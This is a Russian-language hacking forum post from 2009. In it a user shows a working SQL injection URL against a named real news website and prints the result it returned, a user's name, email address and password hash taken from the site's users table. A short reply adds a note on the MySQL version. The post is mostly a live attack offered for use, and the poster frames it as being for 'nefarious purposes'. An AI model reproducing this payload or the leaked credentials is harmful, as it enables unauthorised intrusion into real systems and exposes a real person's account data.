
14.06.2009, 13:09
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
jecka3000, там переменная передается в несколько запросов, в которых количество столбцов для выборки разное. Это видно по ошибке
Но там так же двойной запрос (результат выборки одного передаются в другой), что мы можем использовать в своих гнусных целях
http://www.comingsoon.net/news.php?id=56269+and+1=2+union+select+(select+con cat_ws(0x2F,name,email,password)+from+NEX_USERS+li mit+0,1),2
Вывод в ошибке
Paul Oehler/poehler@nexcess.net/$1$oXa15J8g$2idU4zZjHnXPyYDu94w2C0
UPDATE:
Сообщение от jecka3000
select+table_name,2+from+information_schema.tables
Там 4 версия - information_schema в ней нет
Последний раз редактировалось ElteRUS; 14.06.2009 в 13:32..
|
|
|